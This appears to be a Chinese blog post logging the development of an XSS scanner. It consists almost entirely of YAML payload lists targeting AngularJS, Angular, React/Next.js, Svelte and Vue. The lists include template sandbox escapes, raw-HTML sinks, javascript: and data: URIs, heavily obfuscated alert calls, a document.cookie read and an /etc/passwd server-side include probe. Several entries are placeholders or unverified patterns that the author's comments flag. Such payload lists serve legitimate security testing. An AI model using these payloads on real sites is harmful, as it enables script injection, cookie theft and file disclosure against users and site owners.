HrBeyondXSS开发记录(1)——前端框架payload

2025-03-25 23 0

Angular Payload

# AngularJS (1.x) test strings, grouped by the technique each one exercises.
# Each entry is a literal string; nothing here is substituted at load time.
angularjs:
  # Expressions that reach the Function constructor from inside the
  # AngularJS expression sandbox
  sandbox_escape:
    - "{{constructor.constructor('alert(1)')()}}"
    - "{{ (_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value, 'alert(1)' )() }}"
    - "{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].__proto__,a).value, 'alert(1)')()}}"

  # Scope methods that evaluate a string argument as an expression
  unsafe_methods:
    - "$eval('alert(1)')"
    - "$evalAsync('alert(1)')"
    - "$apply('alert(1)')"

  # Expressions passed through filter arguments
  filter_exploit:
    - "{{'a'|orderBy:'alert(1)'}}"
    - "{{'a'| filter: 'x=alert(1)'}}"

# Angular (2+) test strings. Entries containing `${payload}` are templates —
# presumably the scanner substitutes its own value there; confirm the
# substitution syntax against the consumer.
angular:
  # DomSanitizer bypassSecurityTrust* calls. These are application-code
  # patterns (things to look for in source), not strings injectable via a template.
  sanitizer_bypass:
    - "bypassSecurityTrustHtml('<img src=x onerror=alert(1)>')"
    - "bypassSecurityTrustScript('alert(1)')"
    - "bypassSecurityTrustUrl('javascript:alert(1)')"

  # Template markup with a placeholder in a bound position
  template_injection:
    - "<div [innerHTML]='${payload}'></div>"
    - "<div innerHTML='{{ ${payload} }}'></div>"
    - "<script type='text/ng-template'>${payload}</script>"

  # Zone.js / NgZone wrappers around a placeholder
  zone_js_exploits:
    - "Zone.current.fork({}).run(() => { ${payload} })"
    - "NgZone.runOutsideAngular(() => { ${payload} })"

  # Server-side rendering (SSR) test strings
  ssr_attack:
    - "</xmp><script>alert(1)</script>"
    - "<div>{{ 'a'.constructor.prototype.charAt=[].join;$eval('x=1') }}</div>"

  # Attribute bindings with a placeholder value
  attribute_binding:
    - "<a [attr.href]='${payload}'>click</a>"
    - "<img [attr.src]='${payload}'>"

  # Event bindings with a placeholder handler
  event_binding:
    - "<button (click)='${payload}'>"
    - "<div (mouseover)='${payload}'>"

  # Patterns labelled by the author as applying to Angular 12+ — not verified here
  modern_exploits:
    - "{{ $any({}).constructor.constructor('alert(1)')() }}"
    - "<iframe [srcdoc]='${payload}'></iframe>"
    - "<object [data]='${payload}'></object>"

  # Dependency-injection source patterns (TypeScript, for code review rather
  # than injection)
  dependency_injection:
    - "constructor(private sanitizer: DomSanitizer) { sanitizer.bypassSecurityTrustHtml(${payload}) }"
    - "@Injectable({ providedIn: 'root' }) class ExploitService { constructor() { ${payload} }"

  # Server-side template injection probes; the first combines two template
  # syntaxes ({{ }} and <%= %>) in one string
  ssti:
    - "{{ 7 * 7 }}<%= 7 * 7 %>"
    - "{{ config.__proto__.ENV = {}; ${payload} }}"

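# Encoding / obfuscation variants of the Angular test strings.
# Trailing whitespace removed from the separator lines (yamllint trailing-spaces).
encoding_strategies:
  angular_specific:
    # Template-expression obfuscation
    - "{{ 'a'.constructor.prototype.charAt=[].join; $eval('x=${payload}') }}"

    # Unicode escapes. Note: YAML decodes \uXXXX inside double quotes, so the
    # loaded value is the plain text shown on the right.
    - "\u007B\u007B alert(1) \u007D\u007D"  # {{ alert(1) }}

    # Character insertion (URL-encoded '+')
    - "{{ 'a'|orderBy:'al'%2b'ert(1)' }}"

    # Mixed encoding. `${payload|base64}` carries a filter suffix — presumably
    # handled by the substitution engine; confirm it is supported.
    - "<div [innerHTML]='${payload|base64}'></div>"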

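# Context-sensitive detection rules used to decide where a response/source is
# worth testing. The entries under detection_patterns are regex strings;
# backslashes are doubled because the scalars are double-quoted.
context_rules:
  template_expression:
    detection_patterns:
      # {{ ... }} interpolation
      - "\\{\\{.*\\}\\}"
      # [prop]= or (event)= binding syntax. The character class must contain
      # both '[' and '(' — a pattern of the form \[\(] would only match the
      # literal text "[(]".
      - "[\\[(].*="
    injection_points:
      - "innerHTML"
      - "href"
      - "style"

  # Source-code identifiers that warrant a closer look during review
  security_sensitive:
    dangerous_methods:
      - "bypassSecurityTrust"
      - "renderer2.createElement"
      - "ElementRef.nativeElement"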

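# Framework / version fingerprints. Trailing whitespace removed from the
# separator lines; the regex on the last line is now quoted like its siblings
# (same stored value — plain scalars keep backslashes literally).
version_detection:
  # Markup attributes characteristic of AngularJS (1.x)
  angularjs_signatures:
    - "ng-app"
    - "data-ng-"
    - "ng-controller"

  # Identifiers characteristic of Angular (2+) bundles
  angular_signatures:
    - "platformBrowserDynamic"
    - "@Component"
    - "CommonModule"

  version_patterns:
    - "X-Powered-By: Angular"
    # The surrounding slashes are part of the stored string — confirm the
    # consumer strips them before compiling the regex.
    - "/angular\\/(\\d+\\.\\d+\\.\\d+)/"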

React Payload

# React class-component patterns. `${payload}` is a placeholder — presumably
# filled in by the scanner; confirm the substitution syntax.
react_class:
  # dangerouslySetInnerHTML object literals
  dangerously_set_innerhtml:
    - "{ __html: '<img src=x onerror=${payload}>' }"
    - "{ __html: '<svg onload=${payload}>' }"
    - "{ __html: '<iframe srcdoc=\"${payload}\">' }"

  # Lifecycle methods wrapping a placeholder (source-code patterns)
  lifecycle_injection:
    - "componentDidMount() { ${payload} }"
    - "UNSAFE_componentWillReceiveProps() { ${payload} }"

  # Direct DOM writes through refs (source-code patterns)
  ref_manipulation:
    - "this.myRef.current.innerHTML = ${payload}"
    - "ReactDOM.findDOMNode(this).innerHTML = ${payload}"

# React function-component (hooks) source patterns with a `${payload}` placeholder.
react_hooks:
  # Effect hooks wrapping a placeholder
  useEffect_exploit:
    - "useEffect(() => { ${payload} }, [])"
    - "useLayoutEffect(() => { ${payload} }, [])"

  # Ref-based DOM writes
  useRef_dom_injection:
    - "const ref = useRef(); ref.current.innerHTML = ${payload}"
    - "useImperativeHandle(ref, () => ({ exec: () => ${payload} }))"

  # State setters / initialisers taking a callback
  state_callback:
    - "setState(() => { ${payload} })"
    - "useState(() => { ${payload} })"

# JSX positions where a placeholder can be placed.
jsx_injection:
  # JSX expression containers
  expression_escape:
    - "{${payload}}"
    - "{JSON.stringify({ data: ${payload} })}"

  # Attribute values holding an expression
  attribute_injection:
    - "style={{ color: ${payload} }}"
    - "className={${payload}}"
    - "data-payload={${payload}}"

  # Spread attributes
  spread_operator:
    - "{...${payload}}"
    - "<div {...${payload}} />"

# Next.js source patterns with a `${payload}` placeholder.
nextjs:
  # Client/server component boundaries
  server_components:
    - "'use client'; ${payload}"
    - "export default function Page() { return (${payload}) }"

  # Data-fetching exports
  getServerSideProps:
    - "export async function getServerSideProps() { ${payload} }"
    - "export const getStaticProps = () => { ${payload} }"

  # Edge runtime configuration
  edge_runtime:
    - "export const config = { runtime: 'edge' }; ${payload}"

# React-section obfuscation and prototype patterns.
advanced:
  # Prototype writes (source-code patterns)
  prototype_pollution:
    - "Object.prototype.innerHTML = ${payload}"
    - "this.__proto__.render = () => ${payload}"

  # Immediately-invoked functions inside a JSX expression container
  jsx_function_exec:
    - "{(_ => ${payload})()}"
    - "{(() => ${payload})()}"

  # Escaped identifiers. The backslashes are doubled, so the loaded strings
  # keep the literal \u / \x sequences.
  unicode_smuggling:
    - "{\\u0061lert(1)}"
    - "{['\\x61\\x6c\\x65\\x72\\x74'](1)}"

  # JSFuck-style encoding (only the ECMAScript punctuators []()!+ )
  jsfuck_encoded:
    - "{(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([][[]]+[])[!+[]+!+[]]}"

# Patterns tied to older React APIs (string refs, ReactDOM.render).
legacy:
  # String refs
  string_refs:
    - "ref='${payload}'"
    - "this.refs.${payload}.innerHTML = ''"

  # createElement / render call sites
  react_create_element:
    - "React.createElement('div', { dangerouslySetInnerHTML: { __html: ${payload} }})"
    - "ReactDOM.render(${payload}, document.body)"

# Strings intended to be valid in more than one syntactic context.
polyglot:
  hybrid_vectors:
    - "');alert(1);('"  # closes the surrounding expression
    - "${payload} || alert(1)"
    - "typeof ${payload} === 'function' && ${payload}()"

Svelte Payload

# Svelte 3 test strings. Several entries reference identifiers such as
# `unsafeVariable` or `componentWithXSS` that only mean something inside a
# component — they are source-review patterns rather than raw input.
svelte3:
  # {@html} tags (Svelte's raw-HTML output)
  template_injection:
    - "{@html '<img src=x onerror=alert(1)>'}"
    - "{@html decodeURIComponent('%3Cscript%3Ealert(1)%3C/script%3E')}"
    - "<div>{@html unsafeVariable}</div>"

  # Event handler directives
  event_handlers:
    - "on:click={() => alert(1)}"
    - "on:mouseover={e => prompt(1)}"
    - "on:load={event => new Function('alert(1)')()}"

  # Attribute bindings
  attribute_binding:
    - "<a href={javascript:alert(1)}>click</a>"
    - "<iframe srcdoc={unescapedHTML}>"
    - "<div bind:innerHTML={maliciousContent}></div>"

  # <svelte:*> special elements
  dynamic_components:
    - "<svelte:component this={componentWithXSS}/>"
    - "<svelte:window on:keydown={handleKey}/>"
    - "<svelte:body on:click={executePayload}/>"

  # Store subscriptions that evaluate their value
  store_exploits:
    - "$store.subscribe(value => eval(value))"
    - "writable('alert(1)').update(v => eval(v))"
    - "derived(stores, values => new Function(values))"

# Svelte 4 / runes-era test strings.
svelte4:
  # Runes ($effect, $derived, $props) wrapping a placeholder or eval
  reactivity_bypass:
    - "$effect(() => { ${payload} })"
    - "$derived(() => { eval(inputValue) })"
    - "<script rune> let { pwn = alert(1) } = $props() </script>"

  # Server-side rendering (SSR) test strings
  ssr_vectors:
    - "{@html '<%%>'}<!--#include virtual=\"/etc/passwd\"-->"
    - "<div data-sveltekit-fetched='javascript:alert(1)'></div>"
    - "<svelte:head><!--{ '-->' + payload + '<!--' }--></svelte:head>"

  # Compile-time constructs. The second entry is a compiler directive comment,
  # not an injection string — presumably listed as a marker; verify intent.
  compile_time:
    - "<script context='module'>window.__payload = 'alert(1)'</script>"
    - "<!--svelte-ignore a11y-click-events-have-key-events-->"
    - "<div on:click={unsafeHandler}></div>"

# Framework-independent test strings (Svelte section).
common:
  # Scheme / encoding variants
  encoded_payloads:
    - "JaVaScRiPt:alert(1)"
    - "data:text/html;charset=utf-8,<script>parent.alert(1)</script>"
    - "javascript:eval(String.fromCharCode(97,108,101,114,116,40,49,41))"

  # DOM rewriting from a script element
  dom_manipulation:
    - "<script>document.currentScript.parentElement.innerHTML = '<img src=x onerror=alert(1)>'</script>"
    - "<svelte:self let:props><script>props.execute()</script></svelte:self>"

  # Deferred / asynchronous execution wrappers
  async_execution:
    - "setTimeout(() => alert(1), 500)"
    - "requestIdleCallback(() => { ${payload} })"
    - "new SharedWorker('data:application/javascript,alert(1)')"

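# Test strings grouped by the output context they target.
# Trailing space after the last quoted scalar removed (yamllint trailing-spaces).
context_sensitive:
  # HTML element content
  html_element:
    - "<script>console.log`${document.cookie}`</script>"
    - "<style>@import url(javascript:alert(1));</style>"

  # Attribute / URL context
  attribute_context:
    - "javascript:import('data:text/javascript,alert(1)')"
    - "data:text/svelte,<svelte:options accessors/><script>export let pwn=alert(1);</script>"

  # Tagged template literals. Backslashes are doubled, so the loaded string
  # keeps the literal \x28 / \x29 sequences.
  template_literals:
    - "`${alert(1)}`"
    - "new Function`alert\\x28document.domain\\x29`"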

# Obfuscation variants (Svelte section).
advanced_obfuscation:
  # Note: in double-quoted YAML the \uXXXX escapes below are decoded at load
  # time, unlike the doubled-backslash entries elsewhere in this file.
  unicode_smuggling:
    - "\u0061\u006c\u0065\u0072\u0074(1)"
    - "<\u0073cript>alert(1)</script>"

  # Comment-interleaved forms
  comment_bypass:
    - "<!-- --><script>alert(1)</script><!-- -->"
    - "/**/eval/**/(atob('YWxlcnQoMSk='))/**/"

  # Percent-encoded characters inside tag / identifier names
  chunked_encoding:
    - "<scri%0apt>aler%0at(1)</script>"
    - "<svelte%3Acomponent this=window['al'+'ert']/>"
Vue Payload
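# Vue 2 test strings. `${payload}` is a placeholder — presumably filled in by
# the scanner. Trailing whitespace removed from separator lines.
vue2:
  template_injection:
    - "{{ _c.escape(_s(${payload})) }}"                 # escape-helper bypass
    - "{{ constructor.constructor('alert(1)')() }}"      # constructor chain
    - "{{ _vm.$options.methods.__proto__.x = ${payload} }}" # prototype pollution

  directives:
    v_html:
      - "<div v-html='_c.escape(_s(${payload}))'></div>"  # v-html directive
      - "<component :is='${payload}'></component>"        # dynamic component

    v_bind:
      - ":href='javascript:alert(1)'"                     # javascript: protocol binding
      - ":style='{color: ${payload}}'"                    # CSS injection

  event_handlers:
    - "@click='${payload}'"                              # click-handler injection
    - "@mouseover=\"${payload}\""                        # handler with double quotes
    - "v-on:focus='new Function(${payload})'"            # dynamic Function construction

  filter_exploits:
    - "{{ 'alert(1)' | filterFunction }}"                # filter-argument injection
    - "{{ _vm.$options.filters.__proto__.x = ${payload} }}" # filter prototype pollution

  ssr:
    - "{{#with this}}<script>${payload}</script>{{/with}}" # Mustache template injection
    - "<% ${payload} %>"                                  # server-side template injection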

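# Vue 3 test strings (mostly source-code patterns around a `${payload}`
# placeholder). Trailing whitespace removed from separator lines.
vue3:
  composition_api:
    setup_script:
      - "<script setup>${payload}</script>"              # <script setup> injection
      - "const exploit = () => eval(${payload})"         # arrow-function wrapper

    reactivity:
      - "ref(${payload})"                                # reactive object injection
      - "window.__vue_app__.config.globalProperties.${payload}" # global-properties pollution

  renderer:
    - "createRenderer({ patchProp: ${payload} })"        # renderer hook hijack
    - "h('div', { innerHTML: ${payload} })"              # VNode injection

  modern_features:
    suspense:
      - "<Suspense><template #default>${payload}</template></Suspense>"

    teleport:
      - "<Teleport to='body'>${payload}</Teleport>"

  ecosystem:
    vue_router:
      - "router.beforeEach((${payload}) => {})"           # router-guard injection
      - "this.$router.addRoutes([{ component: ${payload} }])"

    vuex:
      - "store.subscribeAction({ after: ${payload} })"    # action-subscription hook
      - "this.$store._modules.root._rawModule.actions = ${payload}"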

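# Obfuscation variants (Vue section). The string_concat entry that was written
# as `"aler" + "t(1)"` is not valid YAML (content after a closing quote);
# it is now a single single-quoted scalar with the same text. Trailing
# whitespace removed from separator lines.
advanced_obfuscation:
  # Backslashes are doubled, so the loaded strings keep the literal escapes
  unicode_escape:
    - "\\u0061\\u006c\\u0065\\u0072\\u0074(1)"           # Unicode-escaped alert
    - "\\x61\\x6c\\x65\\x72\\x74(1)"                     # hex escape

  string_concat:
    - '"aler" + "t(1)"'
    - "window['al' + 'ert'](1)"

  template_literals:
    - "alert`1`"
    - "window[`al${'ert'}`](1)"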

# Vue dependency-injection and plugin source patterns.
dependency_injection:
  provide_inject:
    - "provide('xss', ${payload})"                       # provide() sink
    - "inject('xss')"                                    # inject() trigger

  plugin_abuse:
    - "app.use({ install: ${payload} })"                 # plugin install hook
    - "app.mixin({ created: ${payload} })"               # global mixin

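# Server-side rendering patterns for Nuxt and VuePress.
# Trailing whitespace removed from the separator line.
server_side:
  nuxt_ssr:
    - "<%= ${payload} %>"                                # Nuxt server template
    - "useAsyncData(() => ${payload})"                   # async data injection

  vuepress:
    - "{{ $page.${payload} }}"                           # theme-variable injection
    - "<ClientOnly>${payload}</ClientOnly>"              # client-only injection point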

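# Sanitizer / sandbox evasion patterns (Vue section). `bypassSanitization` is
# not a Vue API — presumably a stand-in for an application helper; verify.
# Trailing whitespace removed from the separator line.
defense_evasion:
  sanitizer_bypass:
    - "{{ decodeURIComponent(${payload}) }}"             # decode-function bypass
    - "<div v-html='bypassSanitization(${payload})'></div>"

  sandbox_escape:
    - "with(this){${payload}}"                           # with-statement escape
    - "Object.defineProperty(this, 'x', { value: ${payload} })"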

最近时间安排比较紧张，整合了各种框架的 payload。


